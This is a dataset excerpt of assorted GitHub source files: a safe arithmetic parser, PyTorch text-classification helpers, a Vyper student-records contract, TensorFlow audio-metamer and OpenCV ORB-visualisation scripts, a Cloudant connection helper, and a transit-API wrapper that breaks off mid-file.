metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "Jenek209/4a0f9bca3ce79bd9b0a5fa6a95e134d0",
"score": 3
}
|
#### File: graphics_in_the_admin_panel_project/graphics_in_the_admin_panel_application/parser.py
```python
import ast
import operator as op
# supported operators
operators = {ast.Add: op.add, ast.Sub: op.sub, ast.Mult: op.mul,
ast.Div: op.truediv, ast.Pow: op.pow, ast.BitXor: op.xor,
ast.USub: op.neg}
def eval_expr(expr):
return eval_(ast.parse(expr, mode='eval').body)
def eval_(node):
if isinstance(node, ast.Num): # <number>
return node.n
elif isinstance(node, ast.BinOp): # <left> <operator> <right>
return operators[type(node.op)](eval_(node.left), eval_(node.right))
elif isinstance(node, ast.UnaryOp): # <operator> <operand> e.g., -1
return operators[type(node.op)](eval_(node.operand))
else:
raise TypeError(node)
```
|
{
"source": "jenellea/pytorchfundamentals",
"score": 2
}
|
#### File: pytorchfundamentals/nlp-pytorch/torchnlp.py
```python
import builtins
import torch
import torchtext
import collections
import os
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
vocab = None
tokenizer = torchtext.data.utils.get_tokenizer('basic_english')
def load_dataset(ngrams=1,min_freq=1):
global vocab, tokenizer
print("Loading dataset...")
train_dataset, test_dataset = torchtext.datasets.AG_NEWS(root='./data')
train_dataset = list(train_dataset)
test_dataset = list(test_dataset)
classes = ['World', 'Sports', 'Business', 'Sci/Tech']
print('Building vocab...')
counter = collections.Counter()
for (label, line) in train_dataset:
counter.update(torchtext.data.utils.ngrams_iterator(tokenizer(line),ngrams=ngrams))
vocab = torchtext.vocab.Vocab(counter, min_freq=min_freq)
return train_dataset,test_dataset,classes,vocab
def encode(x,voc=None,unk=0,tokenizer=tokenizer):
v = vocab if voc is None else voc
return [v.stoi.get(s,unk) for s in tokenizer(x)]
def train_epoch(net,dataloader,lr=0.01,optimizer=None,loss_fn = torch.nn.CrossEntropyLoss(),epoch_size=None, report_freq=200):
optimizer = optimizer or torch.optim.Adam(net.parameters(),lr=lr)
loss_fn = loss_fn.to(device)
net.train()
total_loss,acc,count,i = 0,0,0,0
for labels,features in dataloader:
optimizer.zero_grad()
features, labels = features.to(device), labels.to(device)
out = net(features)
loss = loss_fn(out,labels) #cross_entropy(out,labels)
loss.backward()
optimizer.step()
total_loss+=loss
_,predicted = torch.max(out,1)
acc+=(predicted==labels).sum()
count+=len(labels)
i+=1
if i%report_freq==0:
print(f"{count}: acc={acc.item()/count}")
if epoch_size and count>epoch_size:
break
return total_loss.item()/count, acc.item()/count
def padify(b,voc=None,tokenizer=tokenizer):
# b is the list of tuples of length batch_size
# - first element of a tuple = label,
# - second = feature (text sequence)
# build vectorized sequence
v = [encode(x[1],voc=voc,tokenizer=tokenizer) for x in b]
# compute max length of a sequence in this minibatch
l = max(map(len,v))
return ( # tuple of two tensors - labels and features
torch.LongTensor([t[0]-1 for t in b]),
torch.stack([torch.nn.functional.pad(torch.tensor(t),(0,l-len(t)),mode='constant',value=0) for t in v])
)
def offsetify(b,voc=None):
# first, compute data tensor from all sequences
x = [torch.tensor(encode(t[1],voc=voc)) for t in b]
# now, compute the offsets by accumulating the tensor of sequence lengths
o = [0] + [len(t) for t in x]
o = torch.tensor(o[:-1]).cumsum(dim=0)
return (
torch.LongTensor([t[0]-1 for t in b]), # labels
torch.cat(x), # text
o
)
def train_epoch_emb(net,dataloader,lr=0.01,optimizer=None,loss_fn = torch.nn.CrossEntropyLoss(),epoch_size=None, report_freq=200,use_pack_sequence=False):
optimizer = optimizer or torch.optim.Adam(net.parameters(),lr=lr)
loss_fn = loss_fn.to(device)
net.train()
total_loss,acc,count,i = 0,0,0,0
for labels,text,off in dataloader:
optimizer.zero_grad()
labels,text = labels.to(device), text.to(device)
if use_pack_sequence:
off = off.to('cpu')
else:
off = off.to(device)
out = net(text, off)
loss = loss_fn(out,labels) #cross_entropy(out,labels)
loss.backward()
optimizer.step()
total_loss+=loss
_,predicted = torch.max(out,1)
acc+=(predicted==labels).sum()
count+=len(labels)
i+=1
if i%report_freq==0:
print(f"{count}: acc={acc.item()/count}")
if epoch_size and count>epoch_size:
break
return total_loss.item()/count, acc.item()/count
```
|
{
"source": "jenellefeather/model_metamers",
"score": 2
}
|
#### File: jenellefeather/model_metamers/build_word_network_reduced_aliasing.py
```python
import sys
import tfcochleagram
import tensorflow as tf
import numpy as np
import scipy.io.wavfile as wav
import pickle
import sys
import json
import os
import scipy
import matplotlib.pylab as plt
import audio_cnn_helpers
import metamer_helpers
# Jittered relu grad is only applied to the metamer generation layer.
# This modification to the gradient helps with optimization for the final layer.
@tf.custom_gradient
def jittered_relu_grad(x):
y = tf.nn.relu(x)
def grad(dy): #clip the zeros.
dy_shape = dy.get_shape()
# Normal relu gradient is equivalent to tf.where(x<=0, 0*dy, 1*dy)
return tf.where(x<=0, dy, dy)
return y, grad
# Build our network
def build_net(_):
pckl_file = 'word_network_reduced_aliasing.pckl'
ckpt_path = 'word_reduced_aliasing.ckpt'
# Parameters to build the cochleagram input, same as used for training
signal_rate = 20000
signal_length_s = 2
COCH_PARAMS = {
"ENV_SR":200,
"HIGH_LIM":8000,
"LOW_LIM":20,
"N":50,
"SAMPLE_FACTOR":4,
"compression":"clipped_point3",
"rFFT":True,
"reshape_kell2018":False,
"erb_filter_kwargs":{'no_lowpass':False, 'no_highpass':False},
# Chosen to normalize a dataset a while ago and used to train these models
"scale_before_compression":796.87416837456942
}
net_name = 'word_reduced_aliasing'
# Load pickle containing the network specification
with open(pckl_file, 'rb') as f:
pckled_network = pickle.load(f)
# Make a variable input tensor (will be optimized)
input_tensor = tf.Variable(np.ones([1,signal_rate*signal_length_s]),
dtype=tf.float32)
trainable = False
training = False
nets = {'input_signal':input_tensor}
# Start a session so that we can easily load the variables.
sess = tf.Session()
# Make the cochleagram graph (input into the word neural network)
with tf.variable_scope('cochlear_network'):
coch_container = tfcochleagram.cochleagram_graph(nets,
signal_rate,
**COCH_PARAMS)
input_tensor = nets['cochleagram']
# Builds the network from the saved pckl for the audio network
with tf.variable_scope('brain_network'):
for layer_idx, layer in enumerate(pckled_network['layer_list']):
layer_name = pckled_network['graph_architecture'][layer_idx]['args']['name']
layer_type = pckled_network['graph_architecture'][layer_idx]['layer_type']
if layer_type == 'tf.layers.batch_normalization':
nets[layer_name]= layer(input_tensor, trainable=trainable, training=training)
elif layer_type == 'tf.layers.dropout':
nets[layer_name] = layer(input_tensor, training=training)
elif layer_type == 'tf.layers.conv2d':
nets[layer_name] = layer(input_tensor, trainable=trainable)
else:
nets[layer_name] = layer(input_tensor)
input_tensor = nets[layer_name]
# Load all of the variables in the scope "brain_network" (excludes the input signal)
brain_globals = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='brain_network')
brain_locals = tf.get_collection(tf.GraphKeys.LOCAL_VARIABLES, scope='brain_network')
# Load a checkpoint
saver = tf.train.Saver(var_list=brain_locals+brain_globals)
saver.restore(sess, ckpt_path)
nets['visualization_input'] = nets['cochleagram']
nets['logits'] = nets['fc_top']['/stimuli/word_int']
nets['predictions'] = tf.nn.softmax(nets['logits'])
# For experiments in Feather et al. 2019 we generated metamers matched to the RELU after each conv
# of fully connected layer.
# This code applies a modified gradient relu after each.
for pre_layer in ['conv_0', 'conv_1', 'conv_2', 'conv_3', 'conv_4', 'fc_intermediate']:
layer_pre_relu = nets[pre_layer]
nets['%s_jittered_relu'%pre_layer] = jittered_relu_grad(layer_pre_relu)
# Choose the layers for the optimization
metamer_gen_layers = ['visualization_input',
'pool_0_0', # a hanning pooling layer after the stride=1 conv
'pool_1_0',
'conv_2_jittered_relu',
'conv_3_jittered_relu',
'conv_4_jittered_relu',
'fc_intermediate_jittered_relu',
'logits']
# Load in the encodings for this network
word_and_speaker_encodings = pickle.load(open('assets/metamer_word_encodings.pckl', 'rb'))
nets['idx_to_label'] = word_and_speaker_encodings['word_idx_to_word']
class_names = nets['idx_to_label']
nets['class_index_offset'] = 0
### Remaining code block runs some sanity checks with an example sound. ###
# Pull in an example sound that is classified correctly (it contains the word "human")
audio_path = 'assets/human_audio_resampled.wav'
wav_word = 'human'
audio_dict = metamer_helpers.use_audio_path_specified_audio(audio_path,
wav_word,
rms_normalize=0.1)
eval_predictions = sess.run(nets['predictions'],
feed_dict={nets['input_signal']: [audio_dict['wav']]}).ravel()
sorted_predictions = np.argsort(eval_predictions)[::-1]
prediction_check_msg = 'Predicted word for human example is %s with %f prob' % (
class_names[sorted_predictions[0] + nets['class_index_offset']],
eval_predictions[sorted_predictions[0]])
predicted_class = class_names[sorted_predictions[0] + nets['class_index_offset']]
assert predicted_class==wav_word, prediction_check_msg
# Make sure that the activations are the same between the normal relu and the modified gradient
# relu for an example layer.
same_layers = {'normal_relu':nets['relu_3'],
'modified_grad_relu':nets['conv_3_jittered_relu']}
check_relu = sess.run(same_layers, feed_dict={nets['input_signal']: [audio_dict['wav']]})
relu_check_msg = ('The activations after the modified gradient ReLU do not '
'match the activations after the normal gradient ReLU.')
assert np.all(check_relu['normal_relu'] == check_relu['modified_grad_relu']), relu_check_msg
return nets, sess, metamer_gen_layers
def main():
nets, session, metamer_gen_layers = build_net('_')
return nets, session, metamer_gen_layers
if __name__== "__main__":
main()
```
|
{
"source": "jenerestain/smart-student",
"score": 3
}
|
#### File: smart-student/contracts/student.v.py
```python
student: public({
balanceOf: currency_value, # cashier issued Philippine Peso-pegged token for e-transaction in PSHS
id_num: bytes32, # Registrar specified Id number (e.g. "13-63623")
enrolled: bool,
first_name: bytes32, # Legal first name
last_name: bytes32, # Legal last name
grade: decimal[6][8] # [year][subject number code]
}[address])
cashier: public(address)
reserve: num
def __init__(_cashier: address):
self.cashier = _cashier # Central token authority
self.reserve = 0 # 100,000 Pesos Starting Cash Reserve
def setFinalGrade(_grade: decimal, _subject: num, _year: num):
assert self.student[msg.sender].enrolled # Throws if student is not yet enrolled
self.student[msg.sender].grade[_year][_subject] = _grade
@payable
def register(_id_num: bytes32, _first_name: bytes32, _last_name: bytes32):
assert not self.student[msg.sender].enrolled # Throws if user is already enrolled
# Adding identity data
self.student[msg.sender].id_num = _id_num
self.student[msg.sender].first_name = _first_name
self.student[msg.sender].last_name = _last_name
self.student[msg.sender].enrolled = True
def issuePeso(_amount: num, _to: address):
assert msg.sender == self.cashier # Throws if user is not the cashier
self.reserve += _amount # Add _amount to current reserve
def transfer(_to: address, _amount: currency_value):
assert self.student[msg.sender].balanceOf >= _amount # Throw if send amount greater than balance
self.student[msg.sender].balanceOf -= _amount
self.student[_to].balanceOf += _amount
```
|
{
"source": "Jenerishka/python_training",
"score": 2
}
|
#### File: python_training/test/test_modif_group.py
```python
from model.group import Group
def test_modification_first_group(app):
if app.group.count() == 0:
app.group.create(Group(name="Group for test modify group"))
old_groups = app.group.get_group_list()
group = Group(name="344fdf", header="dfdf",
footer="sfdfdfew")
group.id = old_groups[0].id
app.group.modif_first_group(group)
new_groups = app.group.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[0] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups,
key=Group.id_or_max)
def test_modification_first_group_name(app):
if app.group.count() == 0:
app.group.create(Group(name="Group for test modify group2"))
old_groups = app.group.get_group_list()
group = Group(name="New name")
group.id = old_groups[0].id
app.group.modif_first_group(group)
new_groups = app.group.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[0] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups,
key=Group.id_or_max)
# def test_modification_first_group_header(app):
# if app.group.count() == 0:
# app.group.create(Group(name="Group for test modify group3"))
# old_groups = app.group.get_group_list()
# app.group.modif_first_group(Group(header="New header"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
```
|
{
"source": "jenerous/orb-visualizor",
"score": 2
}
|
#### File: jenerous/orb-visualizor/orb-visualizer.py
```python
import cv2
import matplotlib.pyplot as plt
import numpy as np
import sys
import os
import math
import json
from time import sleep
# initial threshold for FAST feature (difference to center point)
iniThFast = 20
# reduce threshold for FAST, if not enough feature points were found to this
minThFast = 5
# original patch size for rotation estimation
PATCH_SIZE = 31
HALF_PATCH_SIZE = 15
# how wide shall the window image be
window_width = 1500
# initialize the fast detector, will be used later
fast = cv2.FastFeatureDetector_create(iniThFast, True)
pattern = json.load(open('pattern.json'))
# https://github.com/raulmur/ORB_SLAM2/blob/master/src/ORBextractor.cc#L150
modes = ["fast", "full", "pattern"]
def limit(val, lower, upper):
# clip given value to lower or upper limit
return min(upper, max(lower, val))
def pixel_circle(r):
# find out, which points belong to a pixel circle around a certain point
d = round(math.pi - (2 * r))
x = 0
y = r
cpoints = []
while x <= y:
cpoints.append((x, -y))
cpoints.append((y, -x))
cpoints.append((y, x))
cpoints.append((x, y))
cpoints.append((-x, y))
cpoints.append((-y, x))
cpoints.append((-y, -x))
cpoints.append((-x, -y))
if d < 0:
d += (math.pi * x) + (math.pi * 2)
else:
d += math.pi * (x - y) + (math.pi * 3)
y -= 1
x += 1
return list(set(cpoints))
def calc_umax():
# This relates to https://github.com/raulmur/ORB_SLAM2/blob/f2e6f51cdc8d067655d90a78c06261378e07e8f3/src/ORBextractor.cc#L452
# This is for orientation
# pre-compute the end of a row in a circular patch
umax = [0] * (HALF_PATCH_SIZE + 1)
vmax = int(np.floor(HALF_PATCH_SIZE * np.sqrt(2) / 2 + 1))
vmin = int(np.ceil(HALF_PATCH_SIZE * np.sqrt(2) / 2))
hp2 = HALF_PATCH_SIZE*HALF_PATCH_SIZE;
for v in range(vmax + 1):
umax[v] = int(np.round(np.sqrt(hp2 - v * v)))
# Make sure we are symmetric
v0 = 0
for v in range(HALF_PATCH_SIZE, vmin-1, -1):
while umax[v0] == umax[v0 + 1]:
v0 += 1
umax[v] = v0
v0 += 1
print('umax:', umax)
return umax
def IC_Angle(image, pt, u_max):
# this relates to https://github.com/raulmur/ORB_SLAM2/blob/master/src/ORBextractor.cc#L77
if image.ndim > 2:
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
cpx = int(round(pt[1]))
cpy = int(round(pt[0]))
print('cpx/y/val', cpx, cpy, image[cpy, cpx])
m_01 = int(0)
# Treat the center line differently, v=0
m_10 = sum([u * image[cpy, cpx + u] for u in range(-HALF_PATCH_SIZE, HALF_PATCH_SIZE + 1)])
m_00 = sum([image[cpy, cpx + u] for u in range(-HALF_PATCH_SIZE, HALF_PATCH_SIZE + 1)])
# Go line by line in the circuI853lar patch
for v in range(1, HALF_PATCH_SIZE + 1):
# Proceed over the two lines
v_sum = 0;
d = u_max[v];
for u in range(-d, d + 1):
val_plus = int(image[cpy + v, cpx + u])
val_minus = int(image[cpy - v, cpx + u])
v_sum += (val_plus - val_minus)
m_10 += u * (val_plus + val_minus)
m_00 += val_plus + val_minus
m_01 += v * v_sum
# print('m_01, m_10, m_00', m_01, m_10, m_00)
angle = cv2.fastAtan2(m_01, m_10)
if m_00 == 0 or not m_00:
centerpoint_x = 0
centerpoint_y = 0
else:
centerpoint_x = int(m_10/m_00)
centerpoint_y = int(m_01/m_00)
return angle, centerpoint_x + HALF_PATCH_SIZE, centerpoint_y + HALF_PATCH_SIZE
def put_text_on_enlarged(text, x, y, thickness=1):
# a wrapper for positioning text in the upscaled version of the image
global overlay, canvas, resized
textsize = cv2.getTextSize(text, fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=text_scale, thickness=thickness)[0]
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + x * f) + (canvas.shape[1] - ls * resized.shape[1] + (x + 1) * f)) / 2)
xshift -= textsize[0] // 2
yshift = int(y * f + f / 2)
yshift += textsize[1] // 2
overlay = cv2.putText(
overlay,
text,
(xshift , yshift),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=thickness
)
# start of main
source = ""
while source != "q":
source = input("Filepath or camera index: ")
try:
source = int(source)
in_mode = 'live'
webcam = cv2.VideoCapture(0)
ret, video_frame = webcam.read()
video_frame = cv2.flip(video_frame, 1)
fast_ex = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
break
except:
if os.path.exists(source.strip()):
in_mode = 'file'
fast_ex = cv2.imread(source.strip(), cv2.IMREAD_GRAYSCALE)
break
else:
print("Could not find given path or Camera Device for {}".format(source))
exit()
center = (fast_ex.shape[0] // 2 , fast_ex.shape[1] // 2)
mode = modes[0]
umax = calc_umax()
while True:
if in_mode == 'live':
ret, video_frame = webcam.read()
video_frame = cv2.flip(video_frame, 1)
fast_ex = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
# circle radius
r = HALF_PATCH_SIZE
# calculating the text scale on base of radius. This was just interpolated with two examples
text_scale = -0.04*r+0.87
# how many pixels to pad around cirle
padding = 2
# the representation of the cropped area shall be *scale* times larger than the original height
# keeping cropped separate, to later iterate over it
scale = 1.2
cropped = fast_ex[center[0]-r-padding:center[0]+r+padding+1,
center[1]-r-padding:center[1]+r+padding+1]
resized = cv2.resize(cropped, (int(fast_ex.shape[0] *scale), int(fast_ex.shape[0]*scale)), interpolation=cv2.INTER_NEAREST)
vKeysCell = fast.detect(fast_ex[center[0]-r-padding:center[0]+r+padding+1,
center[1]-r-padding:center[1]+r+padding+1])
# create a new canvas, to paste everything into
canvas = np.ndarray((resized.shape[0], fast_ex.shape[1]+20+resized.shape[1]))
canvas.fill(255)
# where to paste the original image
paste_x1 = 0
paste_x2 = fast_ex.shape[1]
paste_y1 = int(canvas.shape[0] / 2 - fast_ex.shape[0] / 2)
paste_y2 = int(canvas.shape[0] / 2 - fast_ex.shape[0] / 2 + fast_ex.shape[0])
# paste original image
canvas[paste_y1: paste_y2, paste_x1:paste_x2] = fast_ex
# paste resized crop
canvas[:, -resized.shape[1]:] = resized
# scale up everything to make lines smoother
ls = int(np.ceil(window_width/canvas.shape[1]))
canvas = cv2.resize(canvas, (0, 0), fx=ls, fy=ls, interpolation=cv2.INTER_NEAREST)
# pasting things into an overlay, to later increase contrast (black & white)
overlay = np.ndarray(canvas.shape)
# use 128 to indicate emtpy spaces later
overlay.fill(128)
# line from rectangle to top left corner of crop
overlay = cv2.line(
overlay,
(ls * (paste_x1 + center[1]+r+padding), ls * (paste_y1 + center[0]-r-padding)),
(canvas.shape[1] - ls * resized.shape[1], 0), (255),
thickness=2
)
# line from rectangle to bottom left corner of crop
overlay = cv2.line(
overlay,
(ls * (paste_x1 + center[1]+r+padding+1), ls * (paste_y1 + center[0]+r+padding+1)),
(canvas.shape[1]- ls * resized.shape[1], canvas.shape[0]), (255),
thickness=2
)
# rectangle to indicate crop in original image
overlay = cv2.rectangle(
overlay,
(ls * (paste_x1 + center[1]-r-padding), ls * (paste_y1 + center[0]-r-padding)),
(ls * (paste_x1 + center[1]+r+padding+1), ls * (paste_y1 + center[0]+r+padding+1)), (255),
thickness=2
)
# scale factor from original crop to resized version, after scaling up everything
f = (resized.shape[0]) / cropped.shape[0] * ls
pc = pixel_circle(r)
# create vertical lines
for cx in range(cropped.shape[1]):
xshift = int(canvas.shape[1] - ls * resized.shape[1] + cx * f )
overlay = cv2.line(
overlay,
(xshift, 0),
(xshift, canvas.shape[0]),
255
)
# create horizontal lines
for cy in range(cropped.shape[0]):
overlay = cv2.line(
overlay,
(canvas.shape[1] - ls * resized.shape[1], int((1+cy) * f)),
(canvas.shape[1], int((1+cy) * f)),
255
)
# outer circle
overlay = cv2.circle(
overlay,
(int(canvas.shape[1] - ls * resized.shape[1] + cropped.shape[1] / 2 * f ), int(cropped.shape[0] / 2 * f)),
int((r + 0.6) * f),
255
)
# inner circle
overlay = cv2.circle(
overlay,
(int(canvas.shape[1] - ls * resized.shape[1] + cropped.shape[1] / 2 * f ), int(cropped.shape[0] / 2 * f)),
int((r - 0.55) * f),
255
)
if mode == "full":
# circle through all points of the circle and insert the values
for cy in range(-r, r + 1):
yp = [p[0] for p in pc if p[1] == cy]
yshift = cy+r+padding
for cx in range(min(yp), max(yp)+1):
# calculating center of upscaled pixels, with respect to the text size
thick = 1 # 2 if cy == 0 and cx == 0 else 1
textsize = cv2.getTextSize(str(cropped[cy+r+padding, cx+r+padding]), fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=text_scale, thickness=thick)[0]
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + (cx+r+padding) * f) + (canvas.shape[1] - ls * resized.shape[1] + (cx + r + padding + 1) * f)) / 2)
xshift -= textsize[0] // 2
yshift = int((cy+r+padding) * f + f / 2)
yshift += textsize[1] // 2
overlay = cv2.putText(
overlay,
str(cropped[cy+r+padding, cx+r+padding]),
(xshift , yshift),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=thick
)
if cy == 0 and cx == 0:
overlay = cv2.rectangle(
overlay,
(overlay.shape[1] - int((r+1+padding) * f + 2), int((r+padding) * f)),
(overlay.shape[1] - int((r+padding) * f - 1), int((r+1+padding) * f)),
(255),
2
)
elif mode == "fast":
# show which pixels would count into the FAST feature detection
# put values of pixels into cropped / resized image
for cx in range(cropped.shape[1]):
for cy in range(cropped.shape[0]):
if (cx-r-padding, cy-r-padding) in pc or (cx-r-padding == 0 and cy-r-padding == 0):
put_text_on_enlarged(str(cropped[cy, cx]), cx, cy)
if (cx-r-padding == 0 and cy-r-padding == 0):
# add info to point in the center
put_text_on_enlarged("[p]", cx+0.75, cy+0.25,thickness=2)
nb_angle = 2 * np.pi / len(pc)
r_plus = 1.15
for nb, nba in enumerate(np.arange(0.0, 2 * np.pi, nb_angle)):
textsize = cv2.getTextSize('[{}]'.format(nb + 1), fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=text_scale, thickness=2)[0]
nba_x = int(np.sin(nba) * (r + r_plus) * f - overlay.shape[0] / 2 + overlay.shape[1] - textsize[0] / 2)
nba_y = int(-np.cos(nba) * (r + r_plus) * f + overlay.shape[0] / 2 + textsize[1] / 2)
overlay = cv2.putText(
overlay,
'[{}]'.format(nb + 1),
(nba_x, nba_y),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=2
)
elif mode == "pattern":
# show the first x pattern overlayed
pmax = 10
descriptor = []
d_count = 0
for a_x, a_y, b_x, b_y in pattern:
if a_x > padding + r or a_x < - padding - r or \
a_y > padding + r or a_y < - padding - r or \
b_x > padding + r or b_x < - padding - r or \
b_y > padding + r or b_y < - padding - r:
continue
if d_count > pmax:
break
if fast_ex[center[0]+ a_y, center[1]+ a_x] < fast_ex[center[0]+ b_y, center[1]+ b_x]:
descriptor.append("1")
put_text_on_enlarged("{}a".format(d_count), a_x+padding+r, a_y+padding+r)
put_text_on_enlarged("{}b".format(d_count), b_x+padding+r, b_y+padding+r, thickness=2)
else:
descriptor.append("0")
# if fast_ex[center[0]+ a_y, center[1]+ a_x] == fast_ex[center[0]+ b_y, center[1]+ b_x]:
# put_text_on_enlarged("{}a".format(d_count), a_x+padding+r, a_y+padding+r)
# else:
put_text_on_enlarged("{}a".format(d_count), a_x+padding+r, a_y+padding+r, thickness=2)
put_text_on_enlarged("{}b".format(d_count), b_x+padding+r, b_y+padding+r)
d_count += 1
# Also print this onto the image
overlay = cv2.putText(
overlay,
"Descriptor: " + " | ".join(descriptor) + " ...",
(20, overlay.shape[0] - 20),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=1
)
print("Descriptor: " + " | ".join(descriptor) + " ...")
# turning overlay into white (255) pixels, where the underlying image is darker
# and into black (0) pixels, where the underlying image is lighter
overlay[overlay != 128] = np.where(canvas > 150, 50, 200)[overlay != 128]
# pasting in the overlay
canvas[overlay != 128] = overlay[overlay != 128]
# calculate the momentums and angle of a circular patch
a, cpx, cpy = IC_Angle(fast_ex, center, umax)
print("returned", a, cpx, cpy, np.sin(np.deg2rad(a)), np.cos(np.deg2rad(a)))
# initialize an RGB canvas
rgb = cv2.cvtColor(canvas.astype('uint8'), cv2.COLOR_GRAY2BGR)
# draw a line according to the angle
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + (padding + r) * f) + (canvas.shape[1] - ls * resized.shape[1] + ((padding + r) + 1) * f)) / 2)
yshift = int((padding + r) * f + f / 2)
r_red = 1
# drawing reference line and arc
rgb = cv2.line(rgb,
(xshift, yshift),
(int(xshift + (r - r_red) * f), yshift),
(255, 200, 128), 3)
rgb = cv2.ellipse(rgb, (xshift, yshift), ( int((r-r_red-1) * f), int((r-r_red-1) * f)),
0, 0, a, (210, 50, 128), 3)
# drawing arrow
a_x = int(np.cos(np.deg2rad(a)) * (r - r_red) * f - overlay.shape[0] / 2 + overlay.shape[1])
a_y = int(np.sin(np.deg2rad(a)) * (r - r_red) * f + overlay.shape[0] / 2)
rgb = cv2.line(rgb,
(xshift, yshift),
(a_x, a_y),
(128, 150, 0), 3)
a_x_l = int(np.cos(np.deg2rad((a - 150) % 360)) * (1) * f + a_x)
a_y_l = int(np.sin(np.deg2rad((a - 150) % 360)) * (1) * f + a_y)
rgb = cv2.line(rgb,
(a_x, a_y),
(a_x_l, a_y_l),
(128, 150, 0), 3)
a_x_r = int(np.cos(np.deg2rad(a + 150)) * (1) * f + a_x)
a_y_r = int(np.sin(np.deg2rad(a + 150)) * (1) * f + a_y)
rgb = cv2.line(rgb,
(a_x, a_y),
(a_x_r, a_y_r),
(128, 150, 0), 3)
cpx += padding
cpy += padding
# add the angle
rgb = cv2.putText(rgb,
'{:.2f}'.format(a),
(int(xshift + (r - r_red) * f), int(yshift + f / 2)),
cv2.FONT_HERSHEY_COMPLEX,
text_scale * 2,
(255, 200, 128),
2
)
# draw centroid
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + cpx * f) + (canvas.shape[1] - ls * resized.shape[1] + (cpx + 1) * f)) / 2)
yshift = int(cpy * f + f / 2)
rgb = cv2.circle(rgb,
(
xshift,
yshift
), 3,(50, 80, 255), 3)
rgb = cv2.putText(rgb,
"C",
(int(xshift + f), int(yshift + f)),
cv2.FONT_HERSHEY_COMPLEX,
text_scale * 2,
(50, 80, 255),
2
)
# draw keypoints
vKeysCellShifted = []
for vit in vKeysCell:
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + vit.pt[0] * f) + (canvas.shape[1] - ls * resized.shape[1] + (vit.pt[0] + 1) * f)) / 2)
yshift = int(vit.pt[1] * f + f / 2)
vit.pt = (xshift, yshift)
vKeysCellShifted.append(vit)
rgb = cv2.drawKeypoints(rgb, vKeysCellShifted, rgb, (255, 0, 0))
# add some information beneath the image
rgb_info = np.zeros((rgb.shape[0] + 50, rgb.shape[1], rgb.shape[2]), dtype=np.uint8)
rgb_info[:rgb.shape[0], :, :] = rgb
rgb_info = cv2.putText(
rgb_info,
'PATCH: {} | KP: {} || w, a, s, d to position center || +/- to in/decrease patch size || q to quit'.format(PATCH_SIZE, len(vKeysCellShifted)),
(20, rgb.shape[0] + 35),
cv2.FONT_HERSHEY_COMPLEX,
1,
(255, 255, 255)
)
# rescale the window
fscale = window_width / rgb_info.shape[1]
fscale = 1.0 if fscale > 1 else fscale
rgb_info = cv2.resize(rgb_info, (0, 0), fx=fscale, fy=fscale, interpolation=cv2.INTER_LINEAR)
cv2.imshow('rgb', rgb_info)
pressedKey = cv2.waitKey(1) & 0xFF
if pressedKey == ord('q'):
# quit
cv2.destroyAllWindows()
break
if pressedKey == ord('w'):
# set center pixel one higher
center = (center[0] - 1, center[1])
continue
if pressedKey == ord('s'):
# set center pixel one lower
center = (center[0] + 1, center[1])
continue
if pressedKey == ord('a'):
# set center pixel one left
center = (center[0], center[1] - 1)
continue
if pressedKey == ord('d'):
# set center pixel one right
center = (center[0], center[1] + 1)
continue
if pressedKey == ord('m'):
# toggle through modes
mode = modes[modes.index(mode) + 1] if modes.index(mode) + 1 < len(modes) else modes[0]
if pressedKey == ord('p'):
# save a screenshot of the image
cv2.imwrite('live.png', rgb)
if pressedKey == ord('+'):
# increase the patch area
HALF_PATCH_SIZE += 1
PATCH_SIZE += 2
HALF_PATCH_SIZE = limit(HALF_PATCH_SIZE, 2, 20)
PATCH_SIZE = limit(PATCH_SIZE, 5, 41)
umax = calc_umax()
continue
if pressedKey == ord('-'):
# decrease the patch area
HALF_PATCH_SIZE -= 1
PATCH_SIZE -= 2
HALF_PATCH_SIZE = limit(HALF_PATCH_SIZE, 2, 20)
PATCH_SIZE = limit(PATCH_SIZE, 5, 41)
umax = calc_umax()
continue
#sleep(0.001)
```
|
{
"source": "jenerous/vvs-delay",
"score": 3
}
|
#### File: crawler/crawlerhelpers/cloudant_db.py
```python
from cloudant import Cloudant
import json
import os
def get_db_session(cred_file):
creds = None
if 'VCAP_SERVICES' in os.environ:
vcap = json.loads(os.getenv('VCAP_SERVICES'))
print('Found VCAP_SERVICES')
if 'cloudantNoSQLDB' in vcap:
creds = vcap['cloudantNoSQLDB'][0]['credentials']
elif os.path.isfile(cred_file):
with open(cred_file) as f:
vcap = json.load(f)
print('Found local VCAP_SERVICES')
creds = vcap['services']['cloudantNoSQLDB'][0]['credentials']
url = 'https://' + creds['host']
user = creds['username']
password = creds['password']
client = Cloudant(user, password, url=url, connect=True)
return client
```
#### File: crawler/crawlerhelpers/efa_beta.py
```python
from time import strftime
class API_efaBeta(object):
def __init__( self ):
self.name = 'efaBeta'
self.baseurl = 'https://www3.vvs.de/mngvvs/XML_DM_REQUEST'
def convert_station_id( self, station_id ):
"""
convert station id that is given to the api specific
representation if necessary
@param station_id: id in general representation
@return id in api specific representation
"""
return station_id
def get_params( self, current_time_raw, station ):
"""
@param current_time_raw: time as gmtime object
@param station: station id in general representation
@return dict with key value pairs for api parameters
"""
itdDate = strftime("%Y%m%d", current_time_raw)
itdTime = strftime("%H%M", current_time_raw)
return {
'SpEncId' : 0,
'coordOutputFormat' : "EPSG:4326",
'deleteAssignedStops' : 1,
'itdDate' : itdDate,
